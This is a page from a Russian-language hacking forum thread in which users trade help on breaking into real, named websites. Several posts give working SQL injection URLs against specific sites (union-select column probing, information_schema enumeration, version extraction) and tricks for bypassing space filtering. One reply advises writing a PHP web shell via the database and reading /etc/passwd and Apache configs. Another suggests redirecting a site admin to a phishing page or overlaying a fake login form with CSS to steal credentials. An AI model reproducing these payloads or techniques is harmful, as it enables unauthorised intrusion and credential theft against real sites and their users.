Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Я в начале так и предлагал сделать, ну да ладно.
     
    1 person likes this.
  2. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Я не обратил внимание, думал ты за окончание скуля говорил. Спс тебе за всё, очень помог, я много понял благодаря тебе.
     
  3. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    линк не могу дать пока :)
    Я так понял, если выводить существующую колонку из существующей базы то просто загружается страница сайта, а если фейковую то ошибка invalid column name и т.п
     
  4. Basilio

    Basilio New Member

    Joined:
    13 Dec 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    значит я что-то путаю. или чего-то не знаю.

    Есть еще вопрос.
    Пользователь базы - root, почему не записываются файлы с шеллом? (перекодировал код пхп в хекс)
    Папки с кешом не найти, пхпмайадмин тоже хз где?
     
  5. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Altermannn
    http://www.dance4you.ru/teachers/info/data/ic_6/381'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**/

    Чёто я не пойму по моему эт не инъекция! Нжна помощь?
     
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    geforce походу фильтрует +
    но странно вывода помоему ваще нету.. или я неправильно составляю запрос.. а кавычку там не нужно сюдя по запросу..

    Basilio
    посмотри если есть права.. попробуй лоад файл сначало... потом если есть права пробуй сначало успешно залить в /tmp/shell.php потом прочитать его.. если все ок.. читай конфиг апача там где виртуал хостс бери пути... можеш еще прикинуть пути через /etc/passwd
     
    #4586 sabe, 12 Jan 2009
    Last edited: 12 Jan 2009
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    там чпу все карты путает, просто входные даные не проходят urldecode и пробел %20 и + остаються как они есть без преобразования, /**/ такую конструкцию не проведешь т.к. htacess по всей видимости как то преобразует запрос, короче если бы браузер не преобразовал просто пробел в %20 то запрос такой(cсудя по гвери 7 колонок выбераеться):
    -381 union select 1,2,3,4,5,6,7--
    Нужно что то использовать вместо пробелов
     
    #4587 AkyHa_MaTaTa, 12 Jan 2009
    Last edited: 12 Jan 2009
  8. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    %0D,%2B,%09,%0A,%20,+,%2B,/**/,$IFS
    прокатит только прямое обращение к скрипту?ic_6=381/**/...
    Basilio, 1. права mysql.user 2. права субд (юзверя под которым запущен процесс)
    Octave_Parangop, да _bethinking.org/resource.php?ID=233'+order+by+99--+
     
    3 people like this.
  9. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    а ты уверен что опять чпу(.htacess) не захочет преобразовать / в свою переменую?
     
    2 people like this.
  10. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    По моему нет! Он вроде фильтруется!
     
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Кто "он"?


    ЗЫ: Сверху уже два раза раскрутили эту скулю ^^
     
  12. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Сори! Не увидел! он это запрос к базе! Фильтруется /*!

    1. там закрыт доступ к
    Code:
      http://www.bethinking.org/resource.php?ID=233'+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,AES_DECRYPT(AES_ENCRYPT(table_name,1),1),18,19+from+information_schema.tables--+
    пишет:
    Access denied for user 'uccfapologist'@'server1.uccf.org.uk' to database 'information_schema'

    Как тогда посмотреть содерживое скулы только на угад?
     
    #4592 geforce, 12 Jan 2009
    Last edited: 12 Jan 2009
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Там 4 ветка )
    http://www.bethinking.org/resource.php?ID=233'+union+select+1,UNHEX(HEX(version())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19--+
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 AkyHa_MaTaTa:

    не что-то, а именно в данном конкретном случае катит /**/
     
  15. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.aperitif.no/?id=13'
    редирект
    Code:
    http://www.aperitif.no/?id=13+order+by+3--
    главная страница + ошибки
    вывод сделать не получается, все время редирект
     
  16. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Есть такой вопрос,вопшем я нашел активную хсс,вот только дело в том что я тому админу которому на ету страницу зову,то он с телефона! а яваскрипт то там неработает,что можно придумать?????плиз,скорее....((
     
  17. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Можно редиректнуть его на фейк через META refresh
    Code:
    <meta http-equiv="refresh" content="0;url=http://урл_фейка/" />
    или

    можно попробовать стилями (CSS) спрятать поле куда логин пароль вводится и отпозиционировать туда свою форму с вводом логина-пароля и другим action (ну и всё указывающее на то что он уже залогинен тоже спрятать).

    Хотя это муторно и не факт, что реализуемо на практике, но просто идея :) (Зато без скриптов :) )
     
    #4597 Qwazar, 13 Jan 2009
    Last edited: 13 Jan 2009
  18. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Ты хоть сам понял что написал? вопше хсс в основе не определенной странице,и точно что не на вводе логина и пасса,и думаешь ето АДМИНУ ЕТОГО САЙТА будет так беспотпально то что я сделаю?...
     
  19. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    не согласен, давай проведем маленький экспиремент, и так смотри, я буду основываться на показываемой ошибке как конечном результате, и так смотрем гверю:

    http://www.dance4you.ru/teachers/info/data/ic_6/-381'

    и так судя по всему 7 колонок выбераеться,
    и так вызываем ошибку и пробуем посмотреть
    http://www.dance4you.ru/teachers/info/data/ic_6/-381'/**/union/**/select/**/1,2,3,4,5,6,7,2,3,4,5,6--
    и имеем в ответ

    SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'

    то есть кавычка прошла а все остольное нет и что бы в это убедиться смотрем так
    http://www.dance4you.ru/teachers/info/data/ic_6/-381'+union+select/**/1,2,3,4,5,6,7,2,3,4,5,6--

    SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'+union+select

    то все что до /**/ проходит в переменую и вставляеться в гверю а все остольное нет, по все видимости в .htacess ишет значения переменой именно между / / и вставляет ее в запрос, сорее всего,как написал l1ght, только прямое обрашения к скрипту даст какой то результат.
     
    #4599 AkyHa_MaTaTa, 13 Jan 2009
    Last edited: 13 Jan 2009
  20. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Я даже твой пост с трудом понимаю из-за количества ашипок.
     
Thread Status:
Not open for further replies.